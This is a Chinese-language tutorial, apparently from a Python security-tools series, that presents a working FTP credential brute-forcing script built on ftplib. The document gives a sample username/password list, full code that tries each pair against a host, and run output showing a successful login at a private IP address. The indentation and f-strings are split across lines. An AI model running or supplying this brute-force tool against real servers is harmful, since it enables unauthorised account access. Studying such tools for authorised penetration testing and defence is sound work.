暴力破解FTP用戶名/密碼,假設用戶名/密碼對是存儲在一個純文本文件中。如下所示:
administrator:password
admin:12345
root:secret
guest:guest
root:toor
xiaowei:xiaowei
kali_lxw:kali
創建一個名為bruteLogin()的函數,這個函數接收的參數是主機名和含有密碼的文件,返回一個能登錄該主機的用戶名/密碼。該函數逐行讀取文件中的每一行記錄,用戶名和密碼之間是以冒號分隔的。然後函數嘗試用這個用戶名和密碼登錄FTP服務器。如果成功,則返回一個用戶名和密碼的tuple。如果失敗,跳過該異常繼續到下一行。如果函數窮盡所有行仍未成功登錄,則返回一個值為None 、None的tuple。
示例代碼如下:
import ftplib
def bruteLogin(hostname, passwdFile):
with open(passwdFile, 'r') as pF:
for line in pF.readlines():
userName = line.split(':')[0]
passWord = line.split(':')[1].strip('\r').strip('\n')
print(f'[+] Trying {
userName}/{
passWord}')
try:
ftp = ftplib.FTP(hostname)
ftp.login(userName, passWord)
print(f'\n[*] {
str(hostname)} FTP Logon Succeeded: {
userName}/{
passWord}')
ftp.quit()
return (userName, passWord)
except Exception as e:
pass
print('\n[-] Could not brute force FTP credentials')
return (None, None)
host = '192.168.31.82'
passwdFile = 'userpass.txt'
bruteLogin(host, passwdFile)
通過遍歷用戶名/密碼對的列表後, 最終找到了一個有效的用戶名/密碼對:xiaowei/xiaowei。運行結果如下所示:
[+] Trying administrator/password
[+] Trying admin/12345
[+] Trying root/secret
[+] Trying guest/guest
[+] Trying root/toor
[+] Trying xiaowei/xiaowei
[*] 192.168.31.82 FTP Logon Succeeded: xiaowei/xiaowei
Process finished with exit code 0
